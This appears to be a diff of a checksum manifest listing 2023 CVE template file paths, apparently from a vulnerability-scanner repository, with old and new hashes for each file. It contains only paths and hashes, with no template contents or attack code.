-http/cves/2023/CVE-2023-0552.yaml:f5fea9cc64fca25f15b22d32beb59fa6e5fd53b3 -http/cves/2023/CVE-2023-0562.yaml:c42e5fbe32c434cf46b9c3d04ac116ee3a101510 -http/cves/2023/CVE-2023-0563.yaml:29467c73324adf72c414d939dcacdd9b57f29d92 -http/cves/2023/CVE-2023-0600.yaml:cab5c9146e3cdd80b801a5a8e6cdf6643d87acf8 -http/cves/2023/CVE-2023-0602.yaml:ab6d6957b0db0ff69da660e3dbd1d44a75a3d532 -http/cves/2023/CVE-2023-0630.yaml:a5ca6d6d511011a8a0c6b746ef39018673a36904 -http/cves/2023/CVE-2023-0669.yaml:8509a7d95acb5a11716312cf98450875d40bb36a -http/cves/2023/CVE-2023-0777.yaml:9c841b6de9387bd84e8f308128aa8969ae903783 -http/cves/2023/CVE-2023-0900.yaml:f5ef52a22eb81bda65a50e48cebc10b414f51fd9 +http/cves/2023/CVE-2023-0334.yaml:f13aa3bef02e0cd83d9bfc4c65aea77b20368f4a +http/cves/2023/CVE-2023-0448.yaml:dfedc946877bc8a1bc3bd4fc9c8b515b1cc628f3 +http/cves/2023/CVE-2023-0514.yaml:bf6367d122fc32993cad765a65a5a1bcaecece50 +http/cves/2023/CVE-2023-0527.yaml:0faf88d9486931ea7be6e674dc004225bef7060a +http/cves/2023/CVE-2023-0552.yaml:68627804ab050f1e7ba03b64df4cc104bd5e5116 +http/cves/2023/CVE-2023-0562.yaml:091aecba7618a5acb7a4b30c3d9861cdea78cdbb +http/cves/2023/CVE-2023-0563.yaml:7f57f3f428cf9589e6e8e949c4d7cbd1bdee9f0d +http/cves/2023/CVE-2023-0600.yaml:93fc4dd375a8359b840d5910d1e3de8209d86c87 +http/cves/2023/CVE-2023-0602.yaml:87792c888e21b44de78cbf3e45b323801f5a7aac +http/cves/2023/CVE-2023-0630.yaml:26fa649036c47acb143f0d26a6b9f224c1d42fa6 +http/cves/2023/CVE-2023-0669.yaml:29a9728e2500d7918864ad10ad797dce05610475 +http/cves/2023/CVE-2023-0777.yaml:125c3c3f6478028281af224762b6b9f67ef941e7 +http/cves/2023/CVE-2023-0900.yaml:8961e24bad4db1260fa53efc920c011e7a930179 http/cves/2023/CVE-2023-0942.yaml:c43ff68c79ae7cd18349e8d552583865471243c1 -http/cves/2023/CVE-2023-0947.yaml:7535906ded9d616ad86753d0c7f006e5c9827bf4 -http/cves/2023/CVE-2023-0948.yaml:f9584a78568a43539160f6415dded208d0ec9f3b -http/cves/2023/CVE-2023-0968.yaml:c78d22970387d3d7a84d47a2a064b29f93066082 -http/cves/2023/CVE-2023-1020.yaml:e9d24031c198842b4d7d104d9af62a45bee2acb7 -http/cves/2023/CVE-2023-1080.yaml:1d5892f188793b0847afcead4ea1fe23b2fb667f -http/cves/2023/CVE-2023-1177.yaml:7544e08295a0769e2243d9ffa3ba838f6b2c1fcc -http/cves/2023/CVE-2023-1263.yaml:3f76073623184935501703285385f36efcd505a1 -http/cves/2023/CVE-2023-1362.yaml:29a9456b682c016d5390e63b443f010b28272d16 -http/cves/2023/CVE-2023-1408.yaml:20f146e8f993e8a5012c0c219acb064799a3f603 +http/cves/2023/CVE-2023-0947.yaml:00b5b3be6ca0748fdea64b27b4b13798a6cb838b +http/cves/2023/CVE-2023-0948.yaml:f1b64bfa74ebd3d094fce9cbc1779f1fed7bcd3c +http/cves/2023/CVE-2023-0968.yaml:d36a85485b177e6d211da018b7e4a1b1df33451b +http/cves/2023/CVE-2023-1020.yaml:4696d468f9ebde63d17230da0a767f525c2e76d2 +http/cves/2023/CVE-2023-1080.yaml:02d72e53a254c4ca008312c8712714186bdb3fe7 +http/cves/2023/CVE-2023-1177.yaml:ad087f8e728aafc6fecb8015b4ca0ecf86c788dd +http/cves/2023/CVE-2023-1263.yaml:36cb0df0a477b9c2a1eba9a1164ffc866e7de1e7 +http/cves/2023/CVE-2023-1362.yaml:e981ac001d54a40537843f53066dad60ea26fad3 +http/cves/2023/CVE-2023-1408.yaml:864a7b788b8767d59cf4212a2cff1872c5f67dcc http/cves/2023/CVE-2023-1434.yaml:8d9ea6102d27ff45261b9622412d4a1ab23b96b1 -http/cves/2023/CVE-2023-1454.yaml:233e8eddd8585b6beee028533b7eea508a583eb0 -http/cves/2023/CVE-2023-1496.yaml:74ae7531969b0bf3e736a1cb6e5d2bd12f5a448f -http/cves/2023/CVE-2023-1546.yaml:40857c885cc880ebb319efac2b91cc2af8df646e -http/cves/2023/CVE-2023-1671.yaml:db1596b4e00b60c4abc366c8a904e99369ad276d +http/cves/2023/CVE-2023-1454.yaml:dd6dc228ef3c2846c502b01de445e7dd9bc2a5a8 +http/cves/2023/CVE-2023-1496.yaml:d0eb651a91cc973ac1d9a63753ec19d12287f377 +http/cves/2023/CVE-2023-1546.yaml:80cf35ed5f990b7fe507b04f24fa480b8210cc29 +http/cves/2023/CVE-2023-1671.yaml:f47deb3dd1dbfa6588024b99956ca034aaa3c438 http/cves/2023/CVE-2023-1698.yaml:89085ec7fa9c9e28ef296a6486af96790b40e7e3 -http/cves/2023/CVE-2023-1730.yaml:8184ca38b91074294d46eb18e7f1f6996fc56393 -http/cves/2023/CVE-2023-1780.yaml:fbd49cdb906a7a46e1183cfbef02ef0d13fbd1d2 -http/cves/2023/CVE-2023-1835.yaml:2be3dcb54ae19df652e2082f76afa390064f8ac8 -http/cves/2023/CVE-2023-1880.yaml:0cee3aefc360702a3bcc17249ef13fba41b0a0e9 -http/cves/2023/CVE-2023-1890.yaml:492c5883297a98400db640b9fd5b0fcfbd27effe +http/cves/2023/CVE-2023-1730.yaml:4704e5d0de568a664da450e1dd6bc458bdcb4154 +http/cves/2023/CVE-2023-1780.yaml:3c8b5917e16383563d2e20d3876a9a80d1ae6295 +http/cves/2023/CVE-2023-1835.yaml:b80cfedbe2f8c3cac510eaa496810a3cb32eaec4 +http/cves/2023/CVE-2023-1880.yaml:39ff85897272d15fcaa614e3a6d7b1f582451fd3 +http/cves/2023/CVE-2023-1890.yaml:aa0b811c35f00413d0c63b087a8b27d8428da789 http/cves/2023/CVE-2023-20073.yaml:aebab70f1d7ba9e549b3ecff3e3074e8a78b1a4f -http/cves/2023/CVE-2023-2009.yaml:37abf645b57f6561ed96a7ee918bcffddbc2107b -http/cves/2023/CVE-2023-2023.yaml:88812acf44e2de205c170f4ef00bd74e456d95d2 +http/cves/2023/CVE-2023-2009.yaml:a2c2bbb0237a5afcf66d68e73e505af87fde8f90 +http/cves/2023/CVE-2023-20198.yaml:7c3f48e3bca4b20d0e28124366d16282b545cccc +http/cves/2023/CVE-2023-2023.yaml:13100bac9d3fe294ea906a09382c0ca3bfe3c594 http/cves/2023/CVE-2023-20864.yaml:5e0106456e043011bdfbefc2076f9093c74d2011 -http/cves/2023/CVE-2023-20887.yaml:4a9a9a6b148b5a8be2b0875352bb7c06a359dfbe -http/cves/2023/CVE-2023-20888.yaml:0e0d536ef0bb6161f7be5073a11a797162c52903 -http/cves/2023/CVE-2023-20889.yaml:2cda143ef3ed7b19d531ea008487244e45f494a3 -http/cves/2023/CVE-2023-2122.yaml:28ae812d56733b10cd8880610d075560f307c536 -http/cves/2023/CVE-2023-2130.yaml:db45ba8fd6df8e1604f02c74b00bd6312864a3b4 -http/cves/2023/CVE-2023-2178.yaml:46a4e383d1b36015b4a67702ed1db01598949a23 -http/cves/2023/CVE-2023-2224.yaml:5ca6b0ba75bb18b4fd77f299ee29d6f92887c9e2 -http/cves/2023/CVE-2023-22432.yaml:b018eab3a11ac4c336d4c99241b409bb53be903d -http/cves/2023/CVE-2023-22463.yaml:f83a2c852179e050ff4a7aefcf887ba0f1156a6c -http/cves/2023/CVE-2023-22478.yaml:1347b30b6a4d950815d93b57689e33a9a3959922 -http/cves/2023/CVE-2023-22480.yaml:427f52355e4759b1bb1c459fde983d5640b2ec28 -http/cves/2023/CVE-2023-22515.yaml:978b0761600008b34c273954e6f2caec2a5e59a8 +http/cves/2023/CVE-2023-20887.yaml:11ff0ba1a07ad694de5d9681e0fd714ad37d147d +http/cves/2023/CVE-2023-20888.yaml:02195efbdbafa751cd2cc49b1f23539f7bf607d3 +http/cves/2023/CVE-2023-20889.yaml:eb1da4d5c027ef7f6af57c1ea460559284580fa0 +http/cves/2023/CVE-2023-2122.yaml:45e5fade437ce0a4d1f98cad4e7d64cf818a5ef5 +http/cves/2023/CVE-2023-2130.yaml:c39d04d4f8479290439a1b6a2b9dbd7899052256 +http/cves/2023/CVE-2023-2178.yaml:fe87fbb3ccdb874a5815ba8a8c07d93659e6c098 +http/cves/2023/CVE-2023-2224.yaml:6ac3a807f0a03b0f1637af119eb25605fcd1ae1d +http/cves/2023/CVE-2023-22432.yaml:fc2944a542f31bbe972c72c51275f4bc7cc952fd +http/cves/2023/CVE-2023-22463.yaml:ecab335eb08a85f4e4f508ca115a77ee09d156e3 +http/cves/2023/CVE-2023-22478.yaml:8b3123c09a7a4dab4540471c6273154ff09ba329 +http/cves/2023/CVE-2023-22480.yaml:633698f230f5cb78d94beaf8f6180622113793cf +http/cves/2023/CVE-2023-22515.yaml:62d12432fd9b86a85a1883a487af065445b5f878 http/cves/2023/CVE-2023-2252.yaml:bb02189bc936b107119e8db698983075c295bb78 -http/cves/2023/CVE-2023-22620.yaml:7cdd4913f2996d4fe321fd12d544bccc763f5b2b -http/cves/2023/CVE-2023-2272.yaml:af3a52a28ac3f235bb653e05849c3537a2cff31d -http/cves/2023/CVE-2023-22897.yaml:a9cac7e094814f551bbbc69fa1d2a2ebab8395f3 -http/cves/2023/CVE-2023-23161.yaml:7132ff404d253d44f3f992b0b3b587d59c288827 -http/cves/2023/CVE-2023-23333.yaml:398602773ed2fed7ea205fa36f8734fff6b37b65 -http/cves/2023/CVE-2023-23488.yaml:a9a9071257ba85c1d8e38d0d5156bcfc8e7909f0 -http/cves/2023/CVE-2023-23489.yaml:e4dc5a7d1887c782300e915d8b58762a2eaf4544 -http/cves/2023/CVE-2023-23491.yaml:ff014f0379d11ad0d6f5869293c25c88d9650699 -http/cves/2023/CVE-2023-23492.yaml:360390df6621d09cb5a8921fc3687371cf65b4c5 -http/cves/2023/CVE-2023-2356.yaml:5a535d1a27e7b413552628078a684625d31255d0 +http/cves/2023/CVE-2023-22620.yaml:124a566865f1d5b215d0e6e4a64d0338473bce48 +http/cves/2023/CVE-2023-2272.yaml:79ca3f65300f13d7c139ae78b948810c07145404 +http/cves/2023/CVE-2023-22897.yaml:c4a353100d8d19410b6c4d1006b5854cdccfa43d +http/cves/2023/CVE-2023-23161.yaml:91a1adf2b32236d260123b8e6647f188e8913fa9 +http/cves/2023/CVE-2023-23333.yaml:56e2dc6d6587d40e0b68ab80eb3e90980238d592 +http/cves/2023/CVE-2023-23488.yaml:43b29d12b16e579597a4ec67c07d2eb6b167206f +http/cves/2023/CVE-2023-23489.yaml:4533e06102e738c5648ac50c09615de580699d0a +http/cves/2023/CVE-2023-23491.yaml:5780ba62558d9f0363d2e0d7f9122da21248bbf3 +http/cves/2023/CVE-2023-23492.yaml:b74fc97eca04e3cce48e33c61bcac6d023aae720 +http/cves/2023/CVE-2023-2356.yaml:dcde029510e9b1c1c17c9e0e6c6f9c18c3819187 http/cves/2023/CVE-2023-23752.yaml:b5cec9caaf4c69085a1abe2b087663f84922ea18 -http/cves/2023/CVE-2023-24044.yaml:0463393c19703bcc97f6fee3bf1d40a54d2d3f7c -http/cves/2023/CVE-2023-24243.yaml:12e543745e20c5b45e1323edcc67a0305ff5eea2 -http/cves/2023/CVE-2023-24278.yaml:6138b234be6e4b7d8652eef7aeebbd91cd03e5de -http/cves/2023/CVE-2023-24322.yaml:e438e77662de2901181b820ca5e060f5d8dd1c98 +http/cves/2023/CVE-2023-24044.yaml:7df96d17ad4ec6d731ba1a23daf0e4daf2b2edf7 +http/cves/2023/CVE-2023-24243.yaml:d5f6cf9f95037c7bf90db44ad3e8317008a2a079 +http/cves/2023/CVE-2023-24278.yaml:e834ee873a562799fa34afe50cf968c0f74fd6f1 +http/cves/2023/CVE-2023-24322.yaml:69da2614fbc39ffa67758da46c060c07e1307cf0 http/cves/2023/CVE-2023-24367.yaml:00eec3f3fabe9bd20f29ec7c09425ba7d6223c2c -http/cves/2023/CVE-2023-24488.yaml:ef6f7e8ec09615f048e0817ec370fdcfa0091eb7 +http/cves/2023/CVE-2023-24488.yaml:3d04c5f4b2cd7d38f89a305bd20579a12dd9ddbe http/cves/2023/CVE-2023-24489.yaml:31b3a4063fa348913c7cab6a240e2775afc740eb -http/cves/2023/CVE-2023-24657.yaml:a47de1222f885c71711e7e4e3c1bbca35c4d363e -http/cves/2023/CVE-2023-24733.yaml:74355d694cdf867206aa8940449d11a65197fcf0 -http/cves/2023/CVE-2023-24735.yaml:cf03325c017ff646397307fe0a8a1f7be5cec7a9 -http/cves/2023/CVE-2023-24737.yaml:4dd328f929830fb7b1da1b1c68ce10e83f6e1e2c -http/cves/2023/CVE-2023-2479.yaml:ad03c191866a50c0f7d942f79640fea444b893ef -http/cves/2023/CVE-2023-25135.yaml:f2f1bb565969d2025412041db22301b1e2bd3240 -http/cves/2023/CVE-2023-25157.yaml:fcb2d39e8419dc76711e21ba43dbae9345672f9c -http/cves/2023/CVE-2023-25346.yaml:b4d223a137a5c4715450bd07b79b271b75103e80 -http/cves/2023/CVE-2023-25573.yaml:c11f38415afe79f57b2705ca72446304824bc55f -http/cves/2023/CVE-2023-25717.yaml:79a3122652b949662883a1333c37eded35d98757 -http/cves/2023/CVE-2023-26067.yaml:150f546c16a0e2332de3a51672fa312cf3d89826 -http/cves/2023/CVE-2023-26255.yaml:0b70a4a43e667bbaf38f6890fe5e91b577a5327f -http/cves/2023/CVE-2023-26256.yaml:a2868e442c1661e2ea9ce8b901342e0a8d337f75 -http/cves/2023/CVE-2023-26360.yaml:8dc5c995f7939c8244d6174723c65995760ac77e -http/cves/2023/CVE-2023-26469.yaml:2ed63dfa8bcf3dbefafcc9d6f51d9811f341831a -http/cves/2023/CVE-2023-2648.yaml:37ab0d1b7bb1637e989a55fd1ea1b8a4c21e667e -http/cves/2023/CVE-2023-26842.yaml:9df86b806f0b40bf9f735467f7cf28f31ee14f6f -http/cves/2023/CVE-2023-26843.yaml:9addb4b503534fa2082c6eb8cbf5c9816edec432 -http/cves/2023/CVE-2023-27008.yaml:5c58f82b48bf2b801c03aff7949f448fd4fe26b2 -http/cves/2023/CVE-2023-27034.yaml:7cb4cbabcf70a36add6b4e27664a5603c11b7943 -http/cves/2023/CVE-2023-27159.yaml:2207a62e82705e936b6183c5371b3e21a0b8c335 -http/cves/2023/CVE-2023-27179.yaml:750b69f8cb75933930ea313f4965d526fcf6d975 -http/cves/2023/CVE-2023-27292.yaml:d36dd3fb5e08fffa72f24ede8223f2e224698d3c -http/cves/2023/CVE-2023-2732.yaml:cb3a133bc381ef64a1815ad57d1f6c05ca633488 +http/cves/2023/CVE-2023-24657.yaml:8407e59fb1b0708dd3a5f8b1a3905e0b1c162146 +http/cves/2023/CVE-2023-24733.yaml:2e981e5e08bc1fb107e163ad643163b194aa4401 +http/cves/2023/CVE-2023-24735.yaml:e2215b3cc4dcdb47afedd81a995d08a985e6f23c +http/cves/2023/CVE-2023-24737.yaml:f6730c04788b035b0dacdb89593dc08aeadab37c +http/cves/2023/CVE-2023-2479.yaml:35a7199137e8948c21463a8ff7456a87c2fb3efc +http/cves/2023/CVE-2023-25135.yaml:0a1b6f2f54ad8b982495ce3502b85588969218ca +http/cves/2023/CVE-2023-25157.yaml:e55c5caefc6fba797dc8ccf05e48d6f75b9e9ff6 +http/cves/2023/CVE-2023-25346.yaml:06d5d905e3174712763b3e238329e374b99514eb +http/cves/2023/CVE-2023-25573.yaml:e5d5eee36b1989afa7608bea6ea827566ab96d65 +http/cves/2023/CVE-2023-25717.yaml:f77f5e82b5bd693f4b804a9200b9e049624247a3 +http/cves/2023/CVE-2023-26067.yaml:34b1898c5548a74ffcd3b42179968efbbcd277e9 +http/cves/2023/CVE-2023-26255.yaml:fa85ef081a294a155ea15fdad31368b992d11c7a +http/cves/2023/CVE-2023-26256.yaml:5320d609f3ae0221c3bb3c575d76f248cc374c28 +http/cves/2023/CVE-2023-26360.yaml:a2aa8f90e17fbaad0f00e6e70bcdb0e6f297c895 +http/cves/2023/CVE-2023-26469.yaml:a45dfc09fd04ea332b0c45911aa8db9c9e5a3174 +http/cves/2023/CVE-2023-2648.yaml:973927f3a43c7584c104774ed54fe4b2eb2c72e6 +http/cves/2023/CVE-2023-26842.yaml:e7bed40a7ac6e9d37ca4664a6fae1b7a0c741366 +http/cves/2023/CVE-2023-26843.yaml:72971bac64470c37b0d35d452eac43d3deceb7bf +http/cves/2023/CVE-2023-27008.yaml:54640068abb449f1b9e6b23f6529832e3a2c86c7 +http/cves/2023/CVE-2023-27034.yaml:0f768714ba36aa57b168673963df3a166288de3f +http/cves/2023/CVE-2023-27159.yaml:8df1859cb150aa5d80560e52d6c36eeb80eda980 +http/cves/2023/CVE-2023-27179.yaml:022107921b25979024265a4ab04b57de3e9d785b +http/cves/2023/CVE-2023-27292.yaml:45e70183a62ea25264fb43ffc093d456aec384da +http/cves/2023/CVE-2023-2732.yaml:d90147746e92250ae8f8968632759f21a5b03a91 http/cves/2023/CVE-2023-27350.yaml:a24f1dd08f6a33c606c51ca0c2f498eff44f0a16 http/cves/2023/CVE-2023-27372.yaml:bd9be6620a03ff2a1a68abc15e236e6d63bc1c2a -http/cves/2023/CVE-2023-27482.yaml:a54166c189c6354c5fb83959c3e83bd280fc7572 -http/cves/2023/CVE-2023-27524.yaml:b80d00dce95a93c75866bfa2ccbe2082eb26ee3a -http/cves/2023/CVE-2023-27587.yaml:35443e79ec58a04210f5e6208fe645c614b54253 -http/cves/2023/CVE-2023-2766.yaml:1f3c801c1fd9ae0841ffba77ecdb7363d23c681c -http/cves/2023/CVE-2023-2779.yaml:2a7aadb7ad133d1f38ac58edde2f573a1bdf3774 -http/cves/2023/CVE-2023-2780.yaml:ecb7e688d3b9b9356854acf8067b44a1df0ef22f -http/cves/2023/CVE-2023-27922.yaml:2c914ef822e1df294a199008c1474ab9b7f87a41 -http/cves/2023/CVE-2023-2796.yaml:8a2fe3df6eb72707759323b43b5cb36d4b58ed28 +http/cves/2023/CVE-2023-27482.yaml:b01485f7afb1834fce51907ee80873a1e82d435c +http/cves/2023/CVE-2023-27524.yaml:d57bdcaf25ac8399f1737f58ea29e3a6c59ebed2 +http/cves/2023/CVE-2023-27587.yaml:2c84a19f2eaea2c76aae926e948bcf23b1aa1992 +http/cves/2023/CVE-2023-2766.yaml:6813c1cdd9a3d84e5898293eba961357d49e7563 +http/cves/2023/CVE-2023-2779.yaml:4f4b1b12b86b36816aa0b5eaad3406110d147fb1 +http/cves/2023/CVE-2023-2780.yaml:4c2c0b3cbea358381bbecee627e4a907f59e4f88 +http/cves/2023/CVE-2023-27922.yaml:abc5cffffe49b2c2bd5d6a62d81acc8ec261a55b +http/cves/2023/CVE-2023-2796.yaml:0595288320b9c09cce930a9d08eb1a795e368e09 http/cves/2023/CVE-2023-28121.yaml:d9876349eeff8c1c9bff0cd8d688946fddd07746 -http/cves/2023/CVE-2023-2813.yaml:fd2f6aa0010df84171e3982228304cce8aa85ce4 -http/cves/2023/CVE-2023-2822.yaml:ea7e566dedf02ce7bdc8d0ed4a15168c8191d139 -http/cves/2023/CVE-2023-2825.yaml:8549e446b20da6593fca674e317fa4a13e97dff7 +http/cves/2023/CVE-2023-2813.yaml:d256bd3f22c36ac4dc30a2b39eac35742ddc162c +http/cves/2023/CVE-2023-2822.yaml:b44964ce5f82aeb872a0b258ac6078148124bce6 +http/cves/2023/CVE-2023-2825.yaml:ea4f18475e8b24e900262445371d557eb2590f9a http/cves/2023/CVE-2023-28343.yaml:89dc10e7c3d7a887205c904914e91baddda90724 -http/cves/2023/CVE-2023-28432.yaml:16ed9f2b3aa6cca55f2c457591a047986adf0a7f -http/cves/2023/CVE-2023-28665.yaml:e50d6b5ed7d7c15f51918d820eec7fb82ee68409 +http/cves/2023/CVE-2023-28432.yaml:fbb64ed9e8a409d0875bef156301b901e51ba9bd +http/cves/2023/CVE-2023-28665.yaml:16981b120e51de64c55ccba5ec98139e3aa17005 http/cves/2023/CVE-2023-29084.yaml:062077f37ba14d3f76eb6c8f3a4335473c538d2a -http/cves/2023/CVE-2023-29298.yaml:06893e2b0543081a8809d28ce34c7b6d14b712d5 -http/cves/2023/CVE-2023-29300.yaml:279228c7f87a6859cf8bfd1dae2f4bd637e71ede -http/cves/2023/CVE-2023-29357.yaml:6daf61c79c171a0d0557db7772c55524fadf505c -http/cves/2023/CVE-2023-29439.yaml:e7b108431b092ed3793919a4a728445d86e42f0b -http/cves/2023/CVE-2023-29489.yaml:41eccab3427ebbff631c6a981f7afe22184bdb00 -http/cves/2023/CVE-2023-29622.yaml:8be6a9d520a6638af6896427886190602b005147 -http/cves/2023/CVE-2023-29623.yaml:6c33157bd5b44b2038816f15d9b68e02b437f0eb -http/cves/2023/CVE-2023-2982.yaml:4ea25f35e3e7563e1ad9b48cca0bd609dc206ad8 -http/cves/2023/CVE-2023-29887.yaml:a41829d745450a61b3815ec9b61e4a744c4a5a24 -http/cves/2023/CVE-2023-29919.yaml:f7e94282da44970c040953a073fa742499f92016 -http/cves/2023/CVE-2023-29922.yaml:2a85673007081d415d89a4119c8beab64772b385 -http/cves/2023/CVE-2023-29923.yaml:e98f9b7712ccfd51109ee039cf951df465dc8f19 +http/cves/2023/CVE-2023-29298.yaml:1dc94bf7a25560c3fe0cc9234057f433895f0151 +http/cves/2023/CVE-2023-29300.yaml:dc5aafd0166a4cf0f6ceed5b8938cfc67ea0f544 +http/cves/2023/CVE-2023-29357.yaml:138e54a26d6de40ff3ca2975456cd518ea95e631 +http/cves/2023/CVE-2023-29439.yaml:144fb7b98eb211269e2a57e73b07bec36c872f66 +http/cves/2023/CVE-2023-29489.yaml:35c37baec72f8394511dd73998431b3665e22772 +http/cves/2023/CVE-2023-29622.yaml:faa465432941789c38b59538c55dd61abf64b603 +http/cves/2023/CVE-2023-29623.yaml:6ea221f2d9e7bc20a00116d2b22afd91002d1420 +http/cves/2023/CVE-2023-2982.yaml:d1c1a97baa8dfe5b28acf5d725b8d37cb7e8a8c0 +http/cves/2023/CVE-2023-29887.yaml:021035182a2393697acb1b15a5f598146c3dc7bd +http/cves/2023/CVE-2023-29919.yaml:7c542293e23d96f805277f752de42b1141f5df1e +http/cves/2023/CVE-2023-29922.yaml:542393e1adbc4191170be7cef1e62e729acef9fb +http/cves/2023/CVE-2023-29923.yaml:3a2562439e2e1b493f13b85f5f2c00504eb50430 http/cves/2023/CVE-2023-30013.yaml:201a75e0eb08089c1499f9d54f6752bf28c2041b -http/cves/2023/CVE-2023-30019.yaml:be4eceab7cfbfce815484f2b3f20e54047673dbf -http/cves/2023/CVE-2023-30150.yaml:8c38428cef3762cfcbdcb7bf362c3c6be1bc1fc6 -http/cves/2023/CVE-2023-30210.yaml:d4575151e02797aed93b87cd18be263c29c0680e -http/cves/2023/CVE-2023-30212.yaml:080950b9f6f730321cee92a2773728cd225da0d2 -http/cves/2023/CVE-2023-30256.yaml:b1f62a2b0b096a12d710a0f1e3440b747cada847 +http/cves/2023/CVE-2023-30019.yaml:ece4734ee3bcb4c8e648b46e805160f95b35d044 +http/cves/2023/CVE-2023-30150.yaml:fe7f7eeb5d27a2a2159acc8272cbdc81239ad688 +http/cves/2023/CVE-2023-30210.yaml:fac9c5e9057c9b47d8de4d1001cdb62b0b210c47 +http/cves/2023/CVE-2023-30212.yaml:cd42839cb5a5bd002f584ce1c1ae94cdc1595d90 +http/cves/2023/CVE-2023-30256.yaml:0d123471f5a45c62c2d7fb3aa0a976063a4aaa33 http/cves/2023/CVE-2023-30625.yaml:71ce9eaa2413f768be95d6e0e1cb81fd93e0c6fd -http/cves/2023/CVE-2023-30777.yaml:9046fe004039b3a1f78aee21d66caa871632c940 -http/cves/2023/CVE-2023-30868.yaml:fe7b89851feadc6316c067af558983bbb9f92358 -http/cves/2023/CVE-2023-30943.yaml:500f4429ce52623e02ccc5850f6099661d04d774 -http/cves/2023/CVE-2023-31059.yaml:790ab103c6ae76fae1447905ea49e78ae81da5ae -http/cves/2023/CVE-2023-31465.yaml:989889bcba451bceb0a5a00f55aa52a77a14933e -http/cves/2023/CVE-2023-31548.yaml:44da6a0572d987be0b3f7ec6954aee7461928004 +http/cves/2023/CVE-2023-30777.yaml:e8e46e884464f2410d41a124bc71150b8c979dda +http/cves/2023/CVE-2023-30868.yaml:df7d6d7a6109d0730d92a98507a7fe36fe3d4b00 +http/cves/2023/CVE-2023-30943.yaml:ccf97bff0f6a0650a45a8b87ad5788405c15992a +http/cves/2023/CVE-2023-31059.yaml:948a51e4da056540ac04913bd8623228effd5c30 +http/cves/2023/CVE-2023-31465.yaml:22a0ecd6c859c9fad4801a2bbf0080136161cbef +http/cves/2023/CVE-2023-31548.yaml:c803d5b03f015d47443df8467fbf4aabf8bb0e4f http/cves/2023/CVE-2023-32117.yaml:d607de0b2e6561a6f63c504cd7a24a9fbedd78e6 -http/cves/2023/CVE-2023-3219.yaml:a6b04bbd20f4114e7d0bcceb06022fe113c3ef9b -http/cves/2023/CVE-2023-32235.yaml:7d6831142330a53b1dfc0d827cd290b4c6948e15 -http/cves/2023/CVE-2023-32243.yaml:7b5372aa3c5ccb73b38e637e175b9b9d458e7d36 -http/cves/2023/CVE-2023-32315.yaml:4dab71e47124416b253834ac599a075425422288 +http/cves/2023/CVE-2023-3219.yaml:2f6a776bc4163a7fab171b45dccb7670dc2f1c4e +http/cves/2023/CVE-2023-32235.yaml:0f5c20e15cb36421351471bd80694087f9a3f4f1 +http/cves/2023/CVE-2023-32243.yaml:38ae9440f3276764b7df9b1094b14872b2f8fc3b +http/cves/2023/CVE-2023-32315.yaml:2466855fb778ce70a53d205f3b607d647f3715e5 http/cves/2023/CVE-2023-32563.yaml:4bd7ad46d931b10e92a25d8dc56315e4fc2ee3d3 -http/cves/2023/CVE-2023-33338.yaml:6d2db3cbfce277970b93cda9be403034fc70e9b3 -http/cves/2023/CVE-2023-33405.yaml:70d1067337e66662258fe8f5a2872370d96e67fe -http/cves/2023/CVE-2023-33439.yaml:55e8735d3d92e4885571b44cc10f74906d13b187 -http/cves/2023/CVE-2023-33440.yaml:3666839d18d498629573ead4ec8e6bd2f410db3c -http/cves/2023/CVE-2023-3345.yaml:8fabb02dd45022e248ea14d8d348b99d7a37ab65 -http/cves/2023/CVE-2023-33510.yaml:98c21f27d7681b6775c027392b6adfe4058b3564 +http/cves/2023/CVE-2023-33338.yaml:ba9271d3015de272c48df3dee07ad008e9ddef2f +http/cves/2023/CVE-2023-33405.yaml:191620bbcdb8e68cd8770160f89cc4607431b2d8 +http/cves/2023/CVE-2023-33439.yaml:101c3ed8ab05239ddbe640393647d4d9b9d94480 +http/cves/2023/CVE-2023-33440.yaml:c35d429dbc8c82d38a166faa718b04445490a31c +http/cves/2023/CVE-2023-3345.yaml:804d54358440f2b75edd219fdc3090f506b4af0f +http/cves/2023/CVE-2023-33510.yaml:095b4cba9e9d3b2adb38d65c7cfee86fcb41755b http/cves/2023/CVE-2023-33568.yaml:5ea7a6472c2c90f33d70edf308bc7fee19c8772a -http/cves/2023/CVE-2023-33584.yaml:0e69bfdc1bd52565431ecce51e35f4343107161b -http/cves/2023/CVE-2023-33831.yaml:8c29fc9db8ec952fc1dadabedce0a3071dcef3f7 -http/cves/2023/CVE-2023-34124.yaml:2c5dec0aa097e0c47c55240cc2c051bbfb4b3c12 -http/cves/2023/CVE-2023-34192.yaml:ba59755e8fcce81d4a35fc42ebef91a659d25e66 +http/cves/2023/CVE-2023-33584.yaml:e7bc8e2ee2089deb9980951a188cce2e4824c519 +http/cves/2023/CVE-2023-33831.yaml:f9abf9580addb0e3098690dea264aaaf6992a41b +http/cves/2023/CVE-2023-34124.yaml:8da104909b838744d1a9c6934bb91e5581f3e6f7 +http/cves/2023/CVE-2023-34192.yaml:3ba8660bc79540f50461982e9656190302fee770 http/cves/2023/CVE-2023-34259.yaml:48109cfbab8c17c8a68b69b5a1c3880065abf1e0 -http/cves/2023/CVE-2023-34362.yaml:13d682623e5ffd92c5c7c2a1518c45e3b6440731 -http/cves/2023/CVE-2023-34537.yaml:6b731613f259d16c8a451081c6440a6533105c91 -http/cves/2023/CVE-2023-34598.yaml:04b3203723c834672c5f0c0fd7b8fd34eeb006a6 -http/cves/2023/CVE-2023-34599.yaml:7dcf414571c02d175fcc763078e90ad6483b0f46 -http/cves/2023/CVE-2023-3460.yaml:6cc1e4f237bbde03666dd344ea77f11ab2206e5a -http/cves/2023/CVE-2023-34659.yaml:5e150886b2af2f09cbe1acec44579217acbd1d18 -http/cves/2023/CVE-2023-34751.yaml:5e15e7baafda4931f500726ddc00944d3be4a971 -http/cves/2023/CVE-2023-34752.yaml:1cf34b96fd2ba127dff7909a5cb269a3802734fb -http/cves/2023/CVE-2023-34753.yaml:0a584665af14282ccf1b7eca6cf0e21a59f6b083 -http/cves/2023/CVE-2023-34755.yaml:aefd1b8892331d78c0a32cc021b5666ee920a8c7 -http/cves/2023/CVE-2023-34756.yaml:118552237645a5e47edb0eeeb639e898bef435a5 -http/cves/2023/CVE-2023-3479.yaml:ba8fb694f7348863769a5f46fd6400d7eef90c15 -http/cves/2023/CVE-2023-34843.yaml:2c1fe74045e828cf9b036fbece75ce5d994fa238 +http/cves/2023/CVE-2023-34362.yaml:dd6ec76a37a58ca4e2c1be55d72d54b0979828d9 +http/cves/2023/CVE-2023-34537.yaml:c72e888f1ef16321393f7478b76e5c9d07170b9a +http/cves/2023/CVE-2023-34598.yaml:7c98fc24ed032166432cbdcfa36883dacbada2bb 